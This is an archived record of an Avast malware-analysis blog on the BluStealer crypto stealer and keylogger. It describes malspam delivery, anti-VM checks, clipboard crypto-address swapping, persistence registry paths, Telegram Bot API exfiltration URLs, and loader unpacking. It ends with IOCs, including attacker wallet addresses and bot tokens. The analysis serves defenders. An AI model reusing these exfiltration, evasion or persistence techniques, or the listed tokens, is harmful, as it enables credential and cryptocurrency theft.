{
	"id": "f963922b-ed17-403c-8997-8b3c14f28b63",
	"created_at": "2026-04-06T00:12:50.759783Z",
	"updated_at": "2026-04-10T03:20:44.353314Z",
	"deleted_at": null,
	"sha1_hash": "05cbc843983abec3b79e247bc015c89e3393bfcf",
	"title": "BluStealer: From SpyEx to ThunderFox",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6355331,
	"plain_text": "BluStealer: From SpyEx to ThunderFox\r\nBy Threat Research TeamThreat Research Team\r\nArchived: 2026-04-05 20:29:12 UTC\r\nOverview\r\nBluStealer is is a crypto stealer, keylogger, and document uploader written in Visual Basic that loads C#.NET hack tools to\r\nsteal credentials. The family was first mentioned by @James_inthe_box in May and referred to as a310logger. In fact,\r\na310logger is just one of the namespaces within the .NET component that appeared in the string artifacts. Around July,\r\nFortinet referred to the same family as a “fresh malware”, and recently it is mentioned again as BluStealer by GoSecure. In\r\nthis blog, we decide to go with the BluStealer naming while providing a fuller view of the family along with details of its\r\ninner workings.\r\na310logger is just one of the multiple C# hack tools in BluStealer’s .NET component.\r\nBluStealer is primarily spread through malspam campaigns. A large number of the samples we found come from a particular\r\ncampaign that is recognizable through the use of a unique .NET loader. The analysis of this loader is provided in this\r\nsection. Below are two BluStealer malspam samples. The first is a fake DHL invoice in English. The second is a fake\r\nGeneral de Perfiles message, a Mexican metal company, in Spanish. Both samples contain .iso attachments and download\r\nURLs that the messages claim is a form that the lure claims the recipient needs to open and fill out to resolve a problem. The\r\nattachments contain the malware executables packed with the mentioned .NET Loader.\r\nhttps://decoded.avast.io/anhho/blustealer/\r\nPage 1 of 11\n\nIn the graph below, we can see a significant spike in BluStealer activity recently around September 10-11, 2021.\r\nThe daily amount of Avast users protected from BluStealer\r\nBluStealer Analysis\r\nhttps://decoded.avast.io/anhho/blustealer/\r\nPage 2 of 11\n\nAs mentioned, BluStealer consists of a core written in Visual Basic and the C# .NET inner payload(s). Both components\r\nvary greatly among the samples indicating the malware builder’s ability to customize each component separately. The VB\r\ncore reuses a large amount of code from a 2004 SpyEx project, hence the inclusion of “SpyEx” strings in early samples from\r\nMay. However, the malware authors have added the capabilities to steal crypto wallet data, swap crypto addresses present in\r\nthe clipboard, find and upload document files, exfiltrate data through SMTP and the Telegram Bot API, as well as anti-analysis/anti-VM tactics. On the other hand, the .NET component is primarily a credential stealer that is patched together\r\nfrom a combination of open-source C# hack tools such as ThunderFox, ChromeRecovery, StormKitty, and firepwd. Note\r\nthat not all the mentioned features are available in a single sample.\r\nObfuscation\r\nExample of how the strings are decrypted within BluStealer\r\nEach string is encrypted with a unique key. Depending on the sample, the encryption algorithm can be the xor cipher, RC4,\r\nor the WinZip AES implementation from this repo. Below is a Python demonstration of the custom AES algorithm:\r\nA utility to help decrypt all strings in IDA is available here.\r\nAnti-VM Tactics\r\nBluStealer checks the following conditions:\r\nIf property Model of  Win32_ComputerSystem WMI class contains:\r\nVIRTUA (without L), VMware Virtual Platform, VirtualBox, microsoft corporation, vmware, VMware, vmw\r\nIf property SerialNumber of Win32_BaseBoard WMI class contains  0 or None\r\nIf the following files exist:\r\nC:\\\\Windows\\\\System32\\\\drivers\\\\vmhgfs.sys\r\nC:\\\\Windows\\\\System32\\\\drivers\\\\vmmemctl.sys\r\nC:\\\\Windows\\\\System32\\\\drivers\\\\vmmouse.sys\r\nC:\\\\Windows\\\\System32\\\\drivers\\\\vmrawdsk.sys\r\nC:\\\\Windows\\\\System32\\\\drivers\\\\VBoxGuest\\.sys\r\nC:\\\\Windows\\\\System32\\\\drivers\\\\VBoxMouse.sys\r\nhttps://decoded.avast.io/anhho/blustealer/\r\nPage 3 of 11\n\nC:\\\\Windows\\\\System32\\\\drivers\\\\VBoxSF.sys\r\nC:\\\\Windows\\\\System32\\\\drivers\\\\VBoxVideo.sys\r\nIf any of these conditions are satisfied, BluStealer will stop executing.\r\n.NET Component\r\nThe BluStealer retrieves the .NET payload(s) from the resource section and decrypts it with the above WinZip AES\r\nalgorithm using a hardcoded key. Then it executes one of the following command-line utilities to launch the .NET\r\nexecutable(s):\r\nC:\\Windows\\Microsoft.NET\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\AppLaunch.exe\r\nC:\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\InstallUtil.e\r\nExamples of two .NET executables loaded by the VB core. The stolen credentials are written to “credentials.txt”\r\nThe .NET component does not communicate with the VB core in any way. It steals the credentials of popular browsers and\r\napplications then writes them to disk at a chosen location with a designated filename (i.e credentials.txt). The VB core will\r\nlook for this drop and exfiltrate it later on. This mechanic is better explained in the next section.\r\nThe .NET component is just a copypasta of open-source C# projects listed below. You can find more information on their\r\nrespective Github pages:\r\nThunderFox: github.com/V1V1/SharpScribbles\r\nChromeRecovery: github.com/Elysian01/Chrome-Recovery\r\nStormKitty: github.com/swagkarna/StormKitty\r\nFirepwd:github.com/lclevy/firepwd \r\nInformation Stealer\r\nBoth the VB core and the .NET component write stolen information to the %appdata%\\Microsoft\\Templates folder. Each\r\ntype of stolen data is written to a different file with predefined filenames. The VB core sets up different timers to watch over\r\neach file and keeps track of their file sizes. When the file size increases, the VB core will send it to the attacker.\r\nBluStealer VB core also detects the crypto addresses copied to the clipboard and replaces them with the attacker’s\r\npredefined ones. Collectively it can support the following addresses: Bitcoin, bitcoincash, Ethereum, Monero, Litecoin.\r\nData Exfiltration\r\nBluStealer exfiltrates stolen data via SMTP (reusing SpyEx’s code) and Telegram Bot, hence the lack of server-side code.\r\nThe Telegram token and chat_id are hardcoded to execute the 2 commands: sendDocument and sendMessage as shown\r\nhttps://decoded.avast.io/anhho/blustealer/\r\nPage 4 of 11\n\nbelow\r\nhttps://api.telegram.org/bot[BOT TOKEN]/sendMessage?chat_id=[MY_CHANNEL_ID]\u0026text=\r\n[MY_MESSAGE_TEXT]\r\nhttps://api.telegram.org/bot[BOT TOKEN]/sendDocument?chat_id=[MY_CHANNEL_ID]\u0026caption=\r\n[MY_CAPTION]\r\nThe SMTP traffic is constructed using Microsoft MimeOLE specifications\r\nExample of SMTP content\r\n.NET Loader Walkthrough\r\nThis .NET Loader has been used by families such as Formbook, Agent Tesla, Snake Keylogger, Oski Stealer, RedLine, as\r\nwell as BluStealer.\r\nDemo sample: 19595e11dbccfbfeb9560e36e623f35ab78bb7b3ce412e14b9e52d316fbc7acc\r\nFirst Stage\r\nThe first stage of the .NET loader has a generic obfuscated look and isn’t matched by de4dot to any known .NET obfuscator.\r\nHowever, one recognizable characteristic is the inclusion of a single encrypted module in the resource:\r\nhttps://decoded.avast.io/anhho/blustealer/\r\nPage 5 of 11\n\nBy looking for this module’s reference within the code, we can quickly locate where it is decrypted and loaded into memory\r\nas shown below\r\nPrior to loading the next stage, the loader may check for internet connectivity or set up persistence through the Startup folder\r\nand registry run keys. A few examples are:\r\nC:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\chrome\\chrom.exe\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\chrom\r\nC:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\paint\\paint.exe\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\paint\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Startup\r\nC:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\note\\notepad.exe\r\nIn the samples we looked at closely, the module is decrypted using RC4, with a hardcoded key. The key is obfuscated by a\r\nstring provider function. The best way to obtain the payload is to break at the tail jump that resides within the same\r\nnamespace where the encrypted module is referenced. In most cases, it usually is the call to the external function Data().\r\nBelow are examples from the different samples:\r\nhttps://decoded.avast.io/anhho/blustealer/\r\nPage 6 of 11\n\nSecond stage\r\nInside the Data() function of the second stage which has two strange resource files along with their getter functions\r\nThe second stage has the function calls and strings obfuscated, so the “Analyze” feature may not be as helpful. However,\r\nthere are two resource files that look out-of-place enough for us to pivot off. Their getter functions can be easily found in the\r\nResources class of the Properties namespace. Setting the breakpoint on the Ehiuuvbfrnprkuyuxqv getter function\r\n0x17000003 leads us to a function where it is gzip decompressed revealing a PE file.\r\nEhiuuvbfrnprkuyuxqv is decompressed with gzip\r\nOn the other hand, the breakpoint on the Ltvddtjmqumxcwmqlzcos getter function 0x17000004 leaves us in the middle of\r\nthe Data() function, where all the function calls are made by passing a field into CompareComparator function that will\r\ninvoke it like a method.\r\nComareComparator is used to invoke one of the argument\r\nIn order to understand what is going on, we have to know what functions these fields represent. From the experience\r\nworking with MassLogger in the past, the field to method map file is likely embedded in the resource section, which in this\r\ncase, “Dic.Attr” naming is a strong tell.\r\nhttps://decoded.avast.io/anhho/blustealer/\r\nPage 7 of 11\n\nNote that it is important to find out where these fields are mapped to, because “Step into” may not get us directly to the\r\ndesignated functions. Some of the mapped functions are modified during the field-method binding process. So when the\r\ncorresponding fields are invoked, the DynamicResolver.GetCodeInfo() will be called to build the target function at run-time.\r\nEven though the function modification only consists of replacing some opcodes with equivalent ones while keeping the\r\ncontent the same, it is sufficient enough to obfuscate function calls during dynamic analysis.\r\nDic.Attr is interpreted into a field-method dictionary\r\nThe search of the “Dic.Attr” string leads us to the function where the mapping occurs. The dictionary value represents the\r\nmethod token that will be bound, and the key value is the corresponding field. As for the method tokens start with 0x4A, just\r\nreplace them with 0x6 to get the correct methods. These are the chosen ones to be modified for obfuscation purposes.\r\nWith all the function calls revealed, we can understand what’s going on inside the Data() method. First, it loads a new\r\nassembly that is the decompressed Ehiuuvbfrnprkuyuxqv. Then, it tries to create an instance of an object named\r\nSmartAssembly.Queues.MapFactoryQueue. To end the mystery, a method called “RegisterSerializer” is invoked with the\r\ndata of the other resource file as an argument. At this point, we can assume that the purpose of this function would be to\r\ndecrypt the other resource file and execute it.\r\nHeading to the newly loaded module (af43ec8096757291c50b8278631829c8aca13649d15f5c7d36b69274a76efdac), we can\r\nsee the SmartAssembly watermark and all the obfuscation features labeled as shown below.\r\nOverview of the decompressed Ehiuuvbfrnprkuyuxqv. Here you can find the method RegisterSerializer locates inside\r\nSmartAssembly.Queues.MapFactoryQueue\r\nThe unpacking process will not be much different from the previous layer but with the overhead of code virtualization. From\r\nstatic analysis, our RegisterSerializer may look empty but once the SmartAssembly.Queues class is instantiated the method\r\nwill be loaded properly:\r\nThe function content when analyzed statically.\r\nhttps://decoded.avast.io/anhho/blustealer/\r\nPage 8 of 11\n\nThe function content after instantiated. Note that argument “res” represents the data of the second resource file\r\nFast forward to where res is processed inside RegisterSerializer()\r\nLucky for us, the code looks fairly straightforward. The variable “res” holding the encrypted data and is passed to a function\r\nthat RulesListener.IncludeState represents. Once again, the key still is to find the field token to method token map file which\r\nis likely to be located in the resource section. This time searching for the GetManifestResourceStream function will help us\r\nquickly get to the code section where the map is established:\r\nThe resource file Params.Rules is interpreted into a field-method dictionary\r\nRulesListener.IncludeState has token 0x04000220 which is mapped to function 0x60000A3. Inside this function, the\r\ndecryption algorithm is revealed anticlimactically: reversal and decompression:\r\nData from Ltvddtjmqumxcwmqlzcos is reversed\r\nThen it is decompressed and executed\r\nhttps://decoded.avast.io/anhho/blustealer/\r\nPage 9 of 11\n\nIn fact, all the samples can be unpacked simply by decompressing the reversed resource file embedded in the second\r\nstage. Hopefully, even when this algorithm is changed, my lengthy walkthrough will remain useful at showing you how to\r\ndefeat the obfuscation tricks.\r\nConclusion\r\nIn this article, we break down BluStealer functionalities and provide some utilities to deobfuscate and extract its IOCs. We\r\nalso highlight its code reuse of multiple open-source projects. Despite still writing data to disk and without a proper C2\r\nfunctionality, BluStealer is still a capable stealer. In the second half of the blog, we show how the BluStealer samples and\r\nother malware can be obtained from a unique .NET loader. With these insights, we hope that other analysts will have an\r\neasier time classifying and analyzing BluStealer.\r\nIOCs:\r\nThe full list of IoCs is available at https://github.com/avast/ioc/tree/master/BluStealer\r\nBluStealer\r\nSHA-256\r\n678e9028caccb74ee81779c5dd6627fb6f336b2833e9a99c4099898527b0d481\r\n3151ddec325ffc6269e6704d04ef206d62bba338f50a4ea833740c4b6fe770ea\r\n49da8145f85c63063230762826aa8d85d80399454339e47f788127dafc62ac22\r\n7abe87a6b675d3601a4014ac6da84392442159a68992ce0b24e709d4a1d20690\r\nCrypto Address List\r\nBitcoin:\r\n1ARtkKzd18Z4QhvHVijrVFTgerYEoopjLP (1.67227860 BTC)\r\n1AfFoww2ajt5g1YyrrfNYQfKJAjnRwVUsX (0.06755943 BTC)\r\n1MEf31xHgNKqyB7HEeAbcU6BhofMdwLE3r\r\n38atNsForzrDRhJoVAhyXsQLqWYfYgodd5\r\nbc1qrjl4ksg5h7p70jjtypr8s6cjpngzd3kerfj9rt\r\nbc1qjg3y4d4t6hwg6h22khknlxcstevjg2qkrxt6qu\r\n1KfRWVcShzwE2Atp1njogAqH8qodsif3pi\r\n3P6JnvWtubxbCxgPW7GAAj8u6CLV2h9MkY\r\n13vZcoMYRcKrDRDYUyH9Cd4kCRMZVjFkyn\r\nBitcoincash:\r\nqrej5ltx0sgk5c7aygdsvt2gh7fq04umvusxhxl7wq\r\nqrzakt59udz893u2uuwtgrwrjj9dhtk0gc3m4m2sj5\r\nEthereum:\r\n0xd070c48cd3bdeb8a6ca90310249aae90a7f26303 (0.10 ETH)\r\n0x95d3763546235393B77aC188E5B08dD4Af68d89D\r\n0xcfE71c720b7E99e555c0e98b725919B7a69f8Bb0\r\nMonero.address:\r\n46W5WHQG2B1Df9uKrkyuhoLNVtJouMfPR9wMkhrzRiEtD2PmdcXMvQt52jQVWKXUC45hwYRXhBYVjLRbpDu8CK2UN2x\r\n43Q4G9CdM3iNbkwhujAQJ7TedSLxYQ8hJJHYqsqns7qz696gkPgMvUvDcDfZJ7bMzcaQeoSF86eFE2fL9njU59dQRfPHFnv\r\nhttps://decoded.avast.io/anhho/blustealer/\r\nPage 10 of 11\n\nLitecoint address:\r\nLfADbqTZoQhCPBr39mqQpf9myUiUiFrDBG\r\nLY5jmjdFnvgFjJET2wX5fVV6Gv89QdQRv3\r\nTelegram Tokens:\r\n1901905375:AAFoPAvBxaWxmDiYbdJWH-OdsUuObDY0pjs\r\n1989667182:AAFx2Rti45m06IscLpGbHo8v4659Q8swfkQ\r\nSMTP\r\nandres.galarraga@sismode.com (smtp.1and1.com)\r\ninfo@starkgulf.com (mail.starkgulf.com )\r\netopical@bojtai.club (mail.bojtai.club)\r\nfernando@digitaldirecto.es (smtp.ionos.es)\r\nbaerbelscheibll1809@gmail.com\r\ndashboard@grandamishabot.ru (shepherd.myhostcpl.com)\r\nshan@farm-finn.com (mail.farm-finn.com)\r\ninfo@starkgulf.com (mail.starkgulf.com)\r\n.NET Loader SHA-256:\r\nae29f49fa80c1a4fb2876668aa38c8262dd213fa09bf56ee6c4caa5d52033ca1\r\n35d443578b1eb0708d334d3e1250f68550a5db4d630f1813fed8e2fc58a2c6d0\r\n097d0d1119fb73b1beb9738d7e82e1c73ab9c89a4d9b8aeed35976c76d4bad23\r\nc783bdf31d6ee3782d05fde9e87f70e9f3a9b39bf1684504770ce02f29d5b7e1\r\n42fe72df91aa852b257cc3227329eb5bf4fce5dabff34cd0093f1298e3b5454e\r\n1c29ee414b011a411db774015a98a8970bf90c3475f91f7547a16a8946cd5a81\r\n81bbcc887017cc47015421c38703c9c261e986c3fdcd7fef5ca4c01bcf997007\r\n6956ea59b4a70d68cd05e6e740598e76e1205b3e300f65c5eba324bebb31d7e8\r\n6322ebb240ba18119193412e0ed7b325af171ec9ad48f61ce532cc120418c8d5\r\n9f2bfedb157a610b8e0b481697bb28123a5eabd2df64b814007298dffd5e65ac\r\ne2dd1be91c6db4b52eab38b5409b39421613df0999176807d0a995c846465b38\r\nA group of elite researchers who like to stay under the radar.\r\nSource: https://decoded.avast.io/anhho/blustealer/\r\nhttps://decoded.avast.io/anhho/blustealer/\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://decoded.avast.io/anhho/blustealer/"
	],
	"report_names": [
		"blustealer"
	],
	"threat_actors": [],
	"ts_created_at": 1775434370,
	"ts_updated_at": 1775791244,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/05cbc843983abec3b79e247bc015c89e3393bfcf.pdf",
		"text": "https://archive.orkl.eu/05cbc843983abec3b79e247bc015c89e3393bfcf.txt",
		"img": "https://archive.orkl.eu/05cbc843983abec3b79e247bc015c89e3393bfcf.jpg"
	}
}